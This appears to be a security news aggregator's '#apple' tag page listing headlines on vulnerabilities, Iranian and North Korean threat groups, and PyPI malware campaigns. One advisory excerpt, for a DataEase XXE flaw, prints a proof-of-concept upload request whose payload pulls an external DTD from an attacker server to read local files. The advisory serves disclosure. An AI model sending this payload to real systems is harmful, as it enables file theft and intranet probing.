Security
Headlines
HeadlinesLatestCVEs

Tag

#apple

Reservation Management System 1.0 Backup Disclosure

Reservation Management System version 1.0 suffers from a backup disclosure vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox
Meet UNC1860: Iran's Low-Key Access Broker for State Hackers

The group has used more than 30 custom tools to target high-value government and telecommunications organizations on behalf of Iranian intelligence services, researchers say.

GHSA-4m9p-7xg6-f4mm: DataEase has an XML External Entity Reference vulnerability

### Impact There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. 1. send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///...

Relationship broken up? Here&#8217;s how to separate your online accounts

The internet has made breaking up a lot harder. The Modern Love Digital Breakup Checklist can help you separate locations, accounts, and more.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 16-22)

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean

A week in security (September 16 &#8211; September 22)

A list of topics we covered in the week of September 16 to September 22 of 2024

New PondRAT Malware Hidden in Python Packages Targets Software Developers

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in

Apple’s macOS Sequoia Update Breaks Security Tools

Apple’s macOS Sequoia update is causing major compatibility issues with popular security tools. Reportedly, users are facing disruptions…

Iranian Hackers Tried to Give Hacked Trump Campaign Emails to Dems

Plus: The FBI dismantles the largest-ever China-backed botnet, the DOJ charges two men with a $243 million crypto theft, Apple’s MacOS Sequoia breaks cybersecurity tools, and more.

Citrine Sleet Poisons PyPI Packages With Mac &amp; Linux Malware

A North Korean advanced persistent threat (APT) actor (aka Gleaming Pisces) tried to sneak simple backdoors into public software packages.